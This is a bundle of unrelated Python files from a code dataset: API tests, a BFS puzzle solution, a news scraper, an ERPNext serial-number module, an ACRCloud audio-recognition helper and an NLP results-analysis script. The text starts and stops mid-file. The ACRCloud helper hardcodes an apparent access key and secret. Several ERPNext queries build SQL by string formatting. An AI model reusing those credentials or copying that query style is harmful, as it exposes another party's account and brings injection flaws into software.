)\n\n # Act\n response = client.simulate_get('/stops/106')\n\n # Assert\n assert response.status == falcon.HTTP_200\n assert response.json == {'error': 'stop_id: 106 does not exist'}\n\n\nCTA_ERROR_UNSUPPORTED_FUNC_JSON_RESP = (\n os.path.join(CTA_TEST_DIR, 'cta_error_unsupported_function_response.json')\n)\n\n\ndef test_unsupported_function(client, mocker, json_loader):\n # Arrange\n get_mock = mocker.MagicMock()\n get_mock.status_code = 200\n get_mock.json.return_value = json_loader(\n CTA_ERROR_UNSUPPORTED_FUNC_JSON_RESP\n )\n mocker.patch.object(\n backend.cta.requests,\n 'get',\n return_value=get_mock,\n )\n\n # Act\n response = client.simulate_get('/stops/1066')\n\n # Assert\n assert response.status == falcon.HTTP_200\n assert response.json == {\n 'error': \"Unknown error: {'msg': 'Unsupported function'}\"\n }\n\n\nCTA_ERROR_UNKNOWN_TYPE_JSON_RESP = (\n os.path.join(CTA_TEST_DIR, 'cta_error_unknown_type_response.json')\n)\n\n\ndef test_unknown_response_type(client, mocker, json_loader):\n # Arrange\n get_mock = mocker.MagicMock()\n get_mock.status_code = 200\n get_mock.json.return_value = json_loader(\n CTA_ERROR_UNKNOWN_TYPE_JSON_RESP\n )\n mocker.patch.object(\n backend.cta.requests,\n 'get',\n return_value=get_mock,\n )\n\n # Act\n response = client.simulate_get('/stops/1066')\n\n # Assert\n assert response.status == falcon.HTTP_200\n assert response.json == {\n 'error': \"Unexpected response type: {'foo': [{'msg': 'Unknown error'}]}\"\n }\n\n\ndef test_not_implemented(client):\n response = client.simulate_post('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n\n response = client.simulate_put('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n\n response = client.simulate_patch('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n\n response = client.simulate_delete('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n","repo_name":"alysivji/sivmetrics-backend","sub_path":"tests/func/cta_test.py","file_name":"cta_test.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"21986784447","text":"from collections import deque\ndef solution(maps):\n n = len(maps)\n res = 0\n dx, dy = [-1, 1, 0, 0], [0, 0, -1, 1]\n def bfs(x, y):\n d = deque()\n d.append((x, y))\n \n while d:\n x, y = d.popleft()\n for i in range(4):\n nx, ny = x+dx[i], y+dy[i]\n if nx < 0 or nx >= n or ny < 0 or ny >= len(maps[0]): continue \n if maps[nx][ny] == 0: continue\n if maps[nx][ny] == 1:\n maps[nx][ny] = maps[x][y] + 1\n d.append((nx, ny))\n return maps[n-1][len(maps[0])-1]\n res = bfs(0, 0)\n return -1 if res == 1 else res","repo_name":"JiSuMun/Algorithm","sub_path":"프로그래머스/lv2/1844. 게임 맵 최단거리/게임 맵 최단거리.py","file_name":"게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34519585996","text":"\"\"\"\n@author: Julian Gómez\n@description: Programa que explica el tipo de dato \"rangos\"\n\"\"\"\n\ndef run():\n #Generar rango que imprima numeros impares\n rango_impares = range(0,100,2)\n for i in rango_impares:\n print(f\"N° impar: {i+1}\\t\",end=\"\")\n\nif __name__ == \"__main__\":\n run()","repo_name":"JulianG91012/Platzi-Python-Cursos","sub_path":"PensamientoComputacional/rangos.py","file_name":"rangos.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37482854858","text":"#sudo pip install vk\nimport vk\n# c этим сложнее. https://github.com/acrcloud/acrcloud_sdk_python\n# там есть инструкция, только файл setup.py пуст, поэтому нужно в него скопировать содержимое\n# файлика //python2.7/setup.py\nfrom acrcloud.recognizer import ACRCloudRecognizer\n\n# конфиг стандартный, я зарегистрировал аккаунт на acrcloud.com\n\n# интсрукция по заведению нового инстанса есть в мануале на гитхабе, но кажется, нам и с такими ключами хватит\n\nconfig = {\n # Replace \"xxxxxxxx\" below with your project's host, access_key and access_secret.\n 'host': 'eu-west-1.api.acrcloud.com',\n 'access_key': '4aca6d089717c23585f43b957870c8c3',\n 'access_secret': '2WM52yeRg7TaizVhlk7RkdA0FVqgp4iVOupE1CM4',\n 'timeout': 10 # seconds\n}\n\nmusic_file_path = '/Users/akupriyanov/Desktop/icon_hack/englishman.mp3'\n\ndef get_responce(config, music_file_path, start_seconds=3):\n recognizer = ACRCloudRecognizer(config)\n # responce = recognizer.recognize_by_file(file_path='/Users/akupriyanov/Desktop/icon_hack/Oxxxymiron.mp3', start_seconds=3)\n responce = recognizer.recognize_by_file(file_path=music_file_path, start_seconds=start_seconds)\n return responce\n\n\ndef parce_responce(response):\n #print(response)\n split_responce = response.split(':')\n arr_responce = []\n for i, element_responce in enumerate(split_responce):\n arr_responce += element_responce.split(',')\n\n #print(arr_responce)\n is_find = True\n\n for i, element_responce in enumerate(arr_responce):\n if 'msg' in element_responce:\n if 'Success' in arr_responce[i + 1]:\n print(\"Я нашел и начинаю парсинг!\")\n break\n else:\n print(\"Я не нашел:(\")\n is_find = False\n break\n\n title, artist = None, None\n\n if is_find:\n for i, element_responce in enumerate(arr_responce):\n if 'title' in element_responce:\n title = arr_responce[i + 1]\n title = ''.join(\n list(\n filter(\n lambda ch: ch not in \"?.!/;:\\\\\\\"'{[]}\", title)\n )\n )\n if 'artists' in element_responce and 'name' in arr_responce[i + 1]:\n artist = arr_responce[i + 2]\n artist = ''.join(\n list(\n filter(\n lambda ch: ch not in \"?.!/;:\\\\\\\"'{[]}\", artist)\n )\n )\n\n return (title, artist)","repo_name":"HackFactory/IconHack","sub_path":"acrcloud_api.py","file_name":"acrcloud_api.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17266897001","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\nfrom googleapiclient.discovery import build\nfrom google.oauth2.service_account import Credentials\nimport gspread\nimport json\nfrom datetime import datetime\nimport time\n\n# -----------------------------라인 Notify---------------------------------------#\n# lineNotify 라인 Notify에 보낼 형태로 만들어서 전송\ndef lineNotify(message):\n # 라인 Nofify 토큰 조회\n lineNotifyHeaders = {\n \"Authorization\": \"Bearer \" + os.getenv(\"TOKEN_LINE_NOTIFY\")\n }\n lineNotifyDatas = {\n \"message\" : message\n }\n requests.post(url=\"https://notify-api.line.me/api/notify\", headers=lineNotifyHeaders, data=lineNotifyDatas)\n\n# -----------------------------구글 스프레드 시트---------------------------------------#\nSPREADSHEET_ID = os.getenv(\"TOKEN_GOOGLE_SHEET\", \"\")\nGOOGLE_APPLICATION_CREDENTIALS=os.getenv(\"GOOGLE_APPLICATION_CREDENTIALS\", \"\")\n\n# InitHeader 시트의 헤더 세팅\ndef InitHeader(worksheet):\n print(\"InitHeader\")\n worksheet.batch_update([{\n 'range': 'A1:D1',\n 'values': [\n [\"검색어\", \"제목\", \"url\", \"날짜\"]\n ]\n }])\n\n# checkDuplicate 중복검사 후 기존 데이터 앞에 삽입\ndef checkDuplicate(prev, now):\n # 중복검사 후 기존 데이터 앞에 삽입\n if len(prev) > 0:\n for data in now:\n # url이 같은지 확인\n isDuplicate = 0\n for value in prev:\n if value[2] == data[2]:\n isDuplicate = 1\n break\n if isDuplicate == 0:\n prev.insert(0, data)\n else :\n prev = now\n return prev\n\n# 1. 시트가 있는지 확인\n# 1-1. 시트가 없다면 생성\n# 2. 시트의 내용을 확인\n# 2-2. 중복 뉴스 확인\n# 3. 새로운 뉴스 데이터를 추가\n# 시트 확인해서 추가하는 작업 수행\ndef GoogleSpreadSheet(keyword, dataFrame):\n # sheet\n # gc = gspread.service_account(GOOGLE_APPLICATION_CREDENTIALS)\n gc = gspread.service_account_from_dict(json.loads(GOOGLE_APPLICATION_CREDENTIALS))\n sht = gc.open_by_key(SPREADSHEET_ID)\n try:\n # 작업할 시트 조회\n worksheet = sht.worksheet(keyword)\n except:\n # 시트가 없으면 생성\n print(\"Craete Sheet \" + keyword)\n worksheet = sht.add_worksheet(title=keyword, rows=\"100\", cols=\"20\")\n InitHeader(worksheet)\n values = worksheet.get_all_values()\n # 시트의 데이터와 중복이 있는지 검사\n dataFrameUnique = checkDuplicate(values[1:999], dataFrame)\n # 삽입할게 1개 이상인 경우\n if len(dataFrameUnique) - len(values[1:999]) > 0:\n # 최대 1000개까지로 기사 개수 제한\n dataFrameUnique = dataFrameUnique[0:999]\n worksheet.batch_update([{\n 'range': 'A2:D1000',\n 'values': dataFrameUnique,\n }])\n # 신규 기사 발생시 라인 노티\n # lineNotify(\"[\" + keyword + \"]\\n\" + dataFrame[0][1] + \"\\n\" + dataFrame[0][2])\n\n# worker\ndef worker(keywords, sortType, count):\n today = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # 입력한 키워드 만큼 반복\n for keyword in keywords:\n # 네이버에 검색\n r = requests.get(f'https://search.naver.com/search.naver?where=news&query={keyword}&sort={sortType}')\n soup = BeautifulSoup(r.text, 'html.parser')\n # 기사 목록을 원하는 기사 수 만큼 조회\n articles = soup.select('ul.list_news > li')\n _count = count\n dataFrame = []\n for index, article in enumerate(articles):\n if _count > 0:\n if articles[index].select_one('a.news_tit') is not None:\n # 각 요소를 선택\n title = articles[index].select_one('a.news_tit')['title']\n url = articles[index].select_one('a.news_tit')['href']\n dataFrame.append([keyword, title, url, today])\n # 원하는 개수 만큼 기사를 가져왔는지 확인\n _count = _count - 1\n # 구글 스프레드 시트에 최신 뉴스 추가\n GoogleSpreadSheet(keyword, dataFrame)\n\n\n# -----------------------------검색 설정---------------------------------------#\n\n# 검색 단어들 \",\"로 구분된 문자열로 지정\nkeywords = os.getenv(\"KEYWORDS\", \"IBM,AWS,IDG\").split(',')\n# 검색 우선 순위 설정\n# relation 0\n# leatest 1\n# older 2\nsortType = os.getenv(\"SORT_TYPE\", 0)\n# 검색당 가져올 기사 수 (최대 10개)\ncount = int(os.getenv(\"COUNT\", 10))\n\n# worker for googlesheet\nworker(keywords, sortType, count)\n","repo_name":"hojin-kr/newsParserAndLineNotify","sub_path":"naver.py","file_name":"naver.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32033423270","text":"from __future__ import unicode_literals\nimport webnotes\n\nfrom webnotes.utils import cint, getdate, nowdate\nimport datetime\nfrom webnotes import msgprint, _\n\t\nfrom controllers.stock_controller import StockController\n\nclass DocType(StockController):\n\tdef __init__(self, doc, doclist=[]):\n\t\tself.doc = doc\n\t\tself.doclist = doclist\n\n\tdef validate_amc_status(self):\n\t\t\"\"\"\n\t\t\tvalidate amc status\n\t\t\"\"\"\n\t\tif (self.doc.maintenance_status == 'Out of AMC' and self.doc.amc_expiry_date and getdate(self.doc.amc_expiry_date) >= datetime.date.today()) or (self.doc.maintenance_status == 'Under AMC' and (not self.doc.amc_expiry_date or getdate(self.doc.amc_expiry_date) < datetime.date.today())):\n\t\t\tmsgprint(\"AMC expiry date and maintenance status mismatch. Please verify\", raise_exception=1)\n\n\tdef validate_warranty_status(self):\n\t\t\"\"\"\n\t\t\tvalidate warranty status\t\n\t\t\"\"\"\n\t\tif (self.doc.maintenance_status == 'Out of Warranty' and self.doc.warranty_expiry_date and getdate(self.doc.warranty_expiry_date) >= datetime.date.today()) or (self.doc.maintenance_status == 'Under Warranty' and (not self.doc.warranty_expiry_date or getdate(self.doc.warranty_expiry_date) < datetime.date.today())):\n\t\t\tmsgprint(\"Warranty expiry date and maintenance status mismatch. Please verify\", raise_exception=1)\n\n\n\tdef validate_warehouse(self):\n\t\tif self.doc.status=='In Store' and not self.doc.warehouse:\n\t\t\tmsgprint(\"Warehouse is mandatory if this Serial No is In Store\", raise_exception=1)\n\n\tdef validate_item(self):\n\t\t\"\"\"\n\t\t\tValidate whether serial no is required for this item\n\t\t\"\"\"\n\t\titem = webnotes.conn.sql(\"select name, has_serial_no from tabItem where name = '%s'\" % self.doc.item_code)\n\t\tif not item:\n\t\t\tmsgprint(\"Item is not exists in the system\", raise_exception=1)\n\t\telif item[0][1] == 'No':\n\t\t\tmsgprint(\"To proceed please select 'Yes' in 'Has Serial No' in Item master: '%s'\" % self.doc.item_code, raise_exception=1)\n\t\t\t\n\n\tdef validate(self):\n\t\tself.validate_warranty_status()\n\t\tself.validate_amc_status()\n\t\tself.validate_warehouse()\n\t\tself.validate_item()\n\n\tdef on_update(self):\n\t\tif self.doc.warehouse and self.doc.status == 'In Store' \\\n\t\t\t\tand cint(self.doc.sle_exists) == 0 and \\\n\t\t\t\tnot webnotes.conn.sql(\"\"\"select name from `tabStock Ledger Entry` \n\t\t\t\twhere serial_no = %s and ifnull(is_cancelled, 'No') = 'No'\"\"\", self.doc.name):\n\t\t\tself.make_stock_ledger_entry(1)\n\t\t\twebnotes.conn.set(self.doc, 'sle_exists', 1)\n\t\t\t\n\t\t\tself.make_gl_entries()\n\n\tdef make_stock_ledger_entry(self, qty):\n\t\tfrom webnotes.model.code import get_obj\n\t\tvalues = [{\n\t\t\t'item_code'\t\t\t\t: self.doc.item_code,\n\t\t\t'warehouse'\t\t\t\t: self.doc.warehouse,\n\t\t\t'posting_date'\t\t\t: self.doc.purchase_date or (self.doc.creation and self.doc.creation.split(' ')[0]) or nowdate(),\n\t\t\t'posting_time'\t\t\t: self.doc.purchase_time or '00:00',\n\t\t\t'voucher_type'\t\t\t: 'Serial No',\n\t\t\t'voucher_no'\t\t\t: self.doc.name,\n\t\t\t'voucher_detail_no'\t \t: '', \n\t\t\t'actual_qty'\t\t\t: qty, \n\t\t\t'stock_uom'\t\t\t\t: webnotes.conn.get_value('Item', self.doc.item_code, 'stock_uom'),\n\t\t\t'incoming_rate'\t\t\t: self.doc.purchase_rate,\n\t\t\t'company'\t\t\t\t: self.doc.company,\n\t\t\t'fiscal_year'\t\t\t: self.doc.fiscal_year,\n\t\t\t'is_cancelled'\t\t\t: 'No', # is_cancelled is always 'No' because while deleted it can not find creation entry if it not created directly, voucher no != serial no\n\t\t\t'batch_no'\t\t\t\t: '',\n\t\t\t'serial_no'\t\t\t\t: self.doc.name\n\t\t}]\n\t\tget_obj('Stock Ledger').update_stock(values)\n\n\n\tdef on_trash(self):\n\t\tif self.doc.status == 'Delivered':\n\t\t\tmsgprint(\"Cannot trash Serial No : %s as it is already Delivered\" % (self.doc.name), raise_exception = 1)\n\t\telif self.doc.status == 'In Store': \n\t\t\twebnotes.conn.set(self.doc, 'status', 'Not in Use')\n\t\t\tself.make_stock_ledger_entry(-1)\n\t\t\t\n\t\t\tif cint(webnotes.defaults.get_global_default(\"auto_inventory_accounting\")) \\\n\t\t\t\tand webnotes.conn.sql(\"\"\"select name from `tabGL Entry`\n\t\t\t\twhere voucher_type=%s and voucher_no=%s and ifnull(is_cancelled, 'No')='No'\"\"\",\n\t\t\t\t(self.doc.doctype, self.doc.name)):\n\t\t\t\t\tself.make_gl_entries(cancel=True)\n\n\n\tdef on_cancel(self):\n\t\tself.on_trash()\n\n\tdef on_restore(self):\n\t\tself.make_stock_ledger_entry(1)\n\t\tself.make_gl_entries()\n\t\n\tdef on_rename(self, new, old, merge=False):\n\t\t\"\"\"rename serial_no text fields\"\"\"\n\t\tif merge:\n\t\t\tmsgprint(_(\"Sorry. Serial Nos. cannot be merged\"), raise_exception=True)\n\t\t\n\t\tfor dt in webnotes.conn.sql(\"\"\"select parent from tabDocField \n\t\t\twhere fieldname='serial_no' and fieldtype='Text'\"\"\"):\n\t\t\t\n\t\t\tfor item in webnotes.conn.sql(\"\"\"select name, serial_no from `tab%s` \n\t\t\t\twhere serial_no like '%%%s%%'\"\"\" % (dt[0], old)):\n\t\t\t\t\n\t\t\t\tserial_nos = map(lambda i: i==old and new or i, item[1].split('\\n'))\n\t\t\t\twebnotes.conn.sql(\"\"\"update `tab%s` set serial_no = %s \n\t\t\t\t\twhere name=%s\"\"\" % (dt[0], '%s', '%s'),\n\t\t\t\t\t('\\n'.join(serial_nos), item[0]))\n\n\tdef make_gl_entries(self, cancel=False):\n\t\tif not cint(webnotes.defaults.get_global_default(\"auto_inventory_accounting\")):\n\t\t\treturn\n\t\t\t\t\n\t\tfrom accounts.general_ledger import make_gl_entries\n\t\tagainst_stock_account = self.get_company_default(\"stock_adjustment_account\")\n\t\tgl_entries = self.get_gl_entries_for_stock(against_stock_account, self.doc.purchase_rate)\n\t\t\n\t\tfor entry in gl_entries:\n\t\t\tentry[\"posting_date\"] = self.doc.purchase_date or (self.doc.creation and \n\t\t\t\tself.doc.creation.split(' ')[0]) or nowdate()\n\t\t\t\n\t\tif gl_entries:\n\t\t\tmake_gl_entries(gl_entries, cancel)","repo_name":"rohitw1991/adberp","sub_path":"stock/doctype/serial_no/serial_no.py","file_name":"serial_no.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41242154233","text":"\n\"\"\"\nChanges 29/10\n- Added successfull instances\n\n4/11\n- Look for specific verb/Fehler anhand der Verben quantifizieren\n\"\"\"\n\n\n\nimport pandas\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, precision_recall_fscore_support, confusion_matrix, ConfusionMatrixDisplay\nfrom sklearn.metrics import plot_confusion_matrix\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport sys\nimport csv\n\n\ndef get_by_indices(sig, key, indices, prediction, gold_label, data):\n \"\"\"\n Write the missclassified instances out by key and line!\n :param indices:\n :param prediction:\n :param gold_label:\n :param data:\n :return:\n \"\"\"\n with open(\"fine_grained_analysis_\" + key + \".csv\", \"a\", newline='', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n for i in range(len(prediction)):\n if prediction[i] != gold_label[i]:\n idx = indices[i]\n #print(indices[i])\n if key == \"positive\":\n output_string = [data[idx][0], sig, data[idx][3], data[idx][5],str(prediction[i]), str(gold_label[i])]\n writer.writerow(output_string)\n #print(data[idx][0], data[idx][3], data[idx][5], data[idx][-1])\n else:\n output_string = [data[idx][0], sig, data[idx][3], data[idx][4],str(prediction[i]), str(gold_label[i])]\n writer.writerow(output_string)\n\n\ndef return_indices(content, count, signature):\n index = []\n for num, line in enumerate(content[1:]):\n data_sig = line[14]\n if data_sig == signature:\n index.append(line[0])\n print(len(index))\n assert len(index) == count\n return index\n\n\ndef indepth_results_failed(y_true, y_pred, signature_indices):\n \"\"\"\n Compare the predictions to gold labels. Find the instances which are false (or match).\n :param y_true:\n :param y_pred:\n :param signature_indices: contains the indices of the specified signature\n :return:\n \"\"\"\n print(signature_indices)\n y_true_labels = y_true[\"label\"].iloc[signature_indices].values.tolist()\n y_pred_labels = y_pred[\"label\"].iloc[signature_indices].values.tolist()\n #print(\"Gold: \", y_true_labels)\n #print(\"Preds: \", y_pred_labels)\n # Find the indices of errors\n indices_diff = [i for i in range(len(y_pred_labels)) if y_pred_labels[i] != y_true_labels[i]]\n #print(indices_diff)\n values_indices = [signature_indices[i] for i in indices_diff]\n #print(values_indices)\n failed_instances = y_true.iloc[values_indices].values.tolist()\n #print(*failed_instances, sep=\"\\n\")\n indices_diff = set(indices_diff)\n #print(\"Len preds: \", len(y_pred_labels))\n #print(\"Len indices diff: \", len(indices_diff))\n return failed_instances, y_pred_labels, indices_diff\n\n\ndef indepth_results_succed(y_true, y_pred, signature_indices):\n \"\"\"\n Compare the predictions to gold labels. Find the instances which are false (or match).\n :param y_true:\n :param y_pred:\n :param signature_indices:\n :return:\n \"\"\"\n print(signature_indices)\n y_true_labels = y_true[\"label\"].iloc[signature_indices].values.tolist()\n y_pred_labels = y_pred[\"label\"].iloc[signature_indices].values.tolist()\n #print(\"Gold: \", y_true_labels)\n #print(\"Preds: \", y_pred_labels)\n # Find the indices of errors\n indices_equal = [i for i in range(len(y_pred_labels)) if y_pred_labels[i] == y_true_labels[i]]\n #print(indices_diff)\n values_indices = [signature_indices[i] for i in indices_equal]\n #print(values_indices)\n failed_instances = y_true.iloc[values_indices].values.tolist()\n #print(*failed_instances, sep=\"\\n\")\n indices_diff = set(indices_equal)\n return failed_instances, y_pred_labels, indices_equal\n\n# 1197\ndef print_errors_and_predictions(model_type, false_instances, predictions, indices):\n for i,j in zip(false_instances, indices):\n print(\"{}: {} {}\".format(model_type, i, predictions[j]))\n\n\nif __name__ == \"__main__\":\n platform = \"local\"\n paths = {\"local\": \"../data/verb_veridicality_evaluation.tsv\", \"cl\": \"/home/students/meier/MA/verb_veridicality/verb_veridicality_evaluation.tsv\" }\n f = paths[platform]\n #results = sys.argv[1]\n #key_pos_or_neg = sys.argv[2]\n #outputfile = sys.argv[3]\n\n content = []\n with open(f, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n content.append(line.split(\"\\t\"))\n\n plus_plus = return_indices(content, 212, signature=\"+/+\\n\")\n plus_minus = return_indices(content, 100, signature=\"+/-\\n\")\n minus_plus = return_indices(content, 25, signature=\"-/+\\n\")\n neutral_plus = return_indices(content, 63, signature=\"o/+\\n\")\n neutral_minus = return_indices(content, 28, signature=\"o/-\\n\")\n minus_neutral = return_indices(content, 55, signature=\"-/o\\n\")\n plus_neutral = return_indices(content, 80, signature=\"+/o\\n\")\n neutral_neutral = return_indices(content, 935, signature=\"o/o\\n\") #935\n\n indices_dict = {\"plus_plus\": plus_plus, \"plus_minus\": plus_minus, \"minus_plus\": minus_plus, \"neutral_plus\": neutral_plus,\n \"neutral_minus\": neutral_minus, \"minus_neutral\": minus_neutral, \"plus_neutral\": plus_neutral,\n \"neutral_neutral\": neutral_neutral}\n\n indices_key = \"neutral_plus\"\n positive = \"../preprocess/verb_verid_nor.csv\"\n negative = \"../preprocess/verb_verid_neg.csv\"\n key_pos_or_neg = \"pos\"\n pos_or_neg = {\"pos\": positive, \"neg\": negative}\n file = pos_or_neg[key_pos_or_neg]\n\n gold = pd.read_csv(file)\n\n # load the results file\n\n # Positive results\n\n # Positive results\n\n # BART\n #\"\"\"\n bart_42 = pd.read_csv(\"../../results/veridical/predictions/pos/text/Bart_veridicality_nor_results_15175.csv\") #AMRBART_veridicality_pos_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_17 = pd.read_csv(\"../../results/veridical/predictions/pos/text/BART_17_verid_pos_3036.csv\") #AMRBART_17_veridicality_pos_text_2277.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_67 = pd.read_csv(\"../../results/veridical/predictions/pos/text/BART_67_verid_pos_4554.csv\")\n\n # AMRBART Text\n results_42 = pd.read_csv(\"../../results/veridical/predictions/pos/text/amrbart_text_42_tokenizer_pos_3036.csv\") #AMRBART_veridicality_pos_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_17 = pd.read_csv(\"../../results/veridical/predictions/pos/text/amrbart_text_17_tokenizer_pos_2277.csv\") #AMRBART_17_veridicality_pos_text_2277.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_67 = pd.read_csv(\"../../results/veridical/predictions/pos/text/amrbart_text_67_tokenizer_pos_5313.csv\") #AMRBART_67_veridicality_pos_text_5313.csv\")#\"BART_67_verid_neg_4554.csv\")#\"Bart_veridicality_neg_results_15175.csv\")\n\n # Graph\n results_42_graph_only = pd.read_csv(\n \"../../results/veridical/predictions/pos/graph/amrbart_graph_42_graph_tokenizer_pos_2277.csv\")\n results_17_graph_only = pd.read_csv(\n \"../../results/veridical/predictions/pos/graph/amrbart_graph_17_graph_tokenizer_pos_3036.csv\") #AMRBART_17_veridicality_pos_graph_only_3036.csv\")\n results_67_graph_only = pd.read_csv(\n \"../../results/veridical/predictions/pos/graph/amrbart_graph_67_graph_tokenizer_pos_3795.csv\") #AMRBART_67_veridicality_pos_graph_only_3795.csv\")\n\n # Joint\n results_42_joint = pd.read_csv(\n \"../../results/veridical/predictions/pos/joint/amrbart_joint_42_tokenizer_pos_6072.csv\") #AMRBART_verid_joint_pos_7590.csv\")\n results_17_joint = pd.read_csv(\n \"../../results/veridical/predictions/pos/joint/amrbart_joint_17_tokenizer_pos_6072.csv\") #AMRBART_17_verid_joint_pos_5313.csv\")\n results_67_joint = pd.read_csv(\n \"../../results/veridical/predictions/pos/joint/amrbart_joint_67_tokenizer_pos_7590.csv\") #AMRBART_67_verid_joint_pos_5313.csv\")\n #\"\"\"\n # Text # neg\n\n \"\"\"\n # BART\n bart_42 = pd.read_csv(\"../results/veridical/predictions/neg/text/Bart_veridicality_neg_results_15175.csv\") #AMRBART_veridicality_neg_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_17 = pd.read_csv(\"../results/veridical/predictions/neg/text/BART_17_verid_neg_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n bart_67 = pd.read_csv(\"../results/veridical/predictions/neg/text/BART_67_verid_neg_4554.csv\")\n\n # AMRBART Text\n results_42 = pd.read_csv(\"../results/veridical/predictions/neg/text/amrbart_text_42_tokenizer_neg_3036.csv\") #AMRBART_veridicality_neg_text_3036.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_17 = pd.read_csv(\"../results/veridical/predictions/neg/text/amrbart_text_17_tokenizer_neg_2277.csv\")#\"BART_17_verid_neg_3036.csv\")\n results_67 = pd.read_csv(\"../results/veridical/predictions/neg/text/amrbart_text_67_tokenizer_neg_5313.csv\")#\"BART_67_verid_neg_4554.csv\")#\"Bart_veridicality_neg_results_15175.csv\")\n\n # Graph\n results_42_graph_only = pd.read_csv(\"../results/veridical/predictions/neg/graph/amrbart_graph_42_graph_tokenizer_neg_2277.csv\")\n results_17_graph_only = pd.read_csv(\"../results/veridical/predictions/neg/graph/amrbart_graph_17_graph_tokenizer_neg_3036.csv\")\n results_67_graph_only = pd.read_csv(\"../results/veridical/predictions/neg/graph/amrbart_graph_67_graph_tokenizer_neg_3795.csv\")\n\n # Joint\n results_42_joint = pd.read_csv(\"../results/veridical/predictions/neg/joint/amrbart_joint_42_tokenizer_neg_6072.csv\") # AMRBART_verid_joint_neg_7590.csv\")\n results_17_joint = pd.read_csv(\"../results/veridical/predictions/neg/joint/amrbart_joint_17_tokenizer_neg_6072.csv\") # AMRBART_17_verid_joint_neg_5313.csv\")\n results_67_joint = pd.read_csv(\"../results/veridical/predictions/neg/joint/amrbart_joint_67_tokenizer_neg_7590.csv\") # AMRBART_67_verid_joint_neg_5313.csv\")\n \"\"\"\n #print(results.head())\n #df.rename(index={0:\"Index\", 1:\"label\"})\n\n # BART\n bart_res42_failed, bart_predictions_42, bart_indices_42 = indepth_results_failed(gold, bart_42, indices_dict[indices_key])\n bart_res17_failed, bart_predictions_17, bart_indices_17 = indepth_results_failed(gold, bart_17, indices_dict[indices_key])\n bart_res67_failed, bart_predictions_67, bart_indices_67 = indepth_results_failed(gold, bart_67, indices_dict[indices_key])\n\n\n res42_failed, predictions_42, indices_42 = indepth_results_failed(gold, results_42, indices_dict[indices_key])\n res17_failed, predictions_17, indices_17 = indepth_results_failed(gold, results_17, indices_dict[indices_key])\n res67_failed, predictions_67, indices_67 = indepth_results_failed(gold, results_67, indices_dict[indices_key])\n # graph\n res42_failed_graph_only, predictions_42_graph, indices_42_graph = indepth_results_failed(gold, results_42_graph_only, indices_dict[indices_key])\n res17_failed_graph_only, predictions_17_graph, indices_17_graph = indepth_results_failed(gold, results_17_graph_only, indices_dict[indices_key])\n res67_failed_graph_only, predictions_67_graph, indices_67_graph = indepth_results_failed(gold, results_67_graph_only, indices_dict[indices_key])\n # joint\n results_42_joint_failed, predictions_42_joint, indices_42_joint = indepth_results_failed(gold, results_42_joint, indices_dict[indices_key])\n results_17_joint_failed, predictions_17_joint, indices_17_joint = indepth_results_failed(gold, results_17_joint, indices_dict[indices_key])\n results_67_joint_failed, predictions_67_joint, indices_67_joint = indepth_results_failed(gold, results_67_joint, indices_dict[indices_key])\n\n # successfull instances\n # BART\n bart_res42_succed, bart_predictions_42, bart_indices_42_succed = indepth_results_succed(gold, bart_42, indices_dict[indices_key])\n bart_res17_succed, bart_predictions_17, bart_indices_17_succed = indepth_results_succed(gold, bart_17, indices_dict[indices_key])\n bart_res67_succed, bart_predictions_67, bart_indices_67_succed = indepth_results_succed(gold, bart_67, indices_dict[indices_key])\n\n res42_succed, predictions_42, indices_42_succed = indepth_results_failed(gold, results_42, indices_dict[indices_key])\n res17_succed, predictions_17, indices_17_succed = indepth_results_failed(gold, results_17, indices_dict[indices_key])\n res67_succed, predictions_67, indices_67_succed = indepth_results_failed(gold, results_67, indices_dict[indices_key])\n # graph\n res42_succed_graph_only, predictions_42_graph, indices_42_graph_succed = indepth_results_failed(gold, results_42_graph_only, indices_dict[indices_key])\n res17_succed_graph_only, predictions_17_graph, indices_17_graph_succed = indepth_results_failed(gold, results_17_graph_only, indices_dict[indices_key])\n res67_succed_graph_only, predictions_67_graph, indices_67_graph_succed = indepth_results_failed(gold, results_67_graph_only, indices_dict[indices_key])\n # joint\n results_42_joint_succed, predictions_42_joint, indices_42_joint_succed = indepth_results_failed(gold, results_42_joint, indices_dict[indices_key])\n results_17_joint_succed, predictions_17_joint, indices_17_joint_succed = indepth_results_failed(gold, results_17_joint, indices_dict[indices_key])\n results_67_joint_succed, predictions_67_joint, indices_67_joint_succed = indepth_results_failed(gold, results_67_joint, indices_dict[indices_key])\n\n bart_success = bart_res42_succed + bart_res17_succed + bart_res67_succed\n text_success = res42_succed + res17_succed + res67_succed\n graph_sucess = res42_succed_graph_only + res17_succed_graph_only + res67_succed_graph_only\n joint_success = results_42_joint_succed + results_17_joint_succed 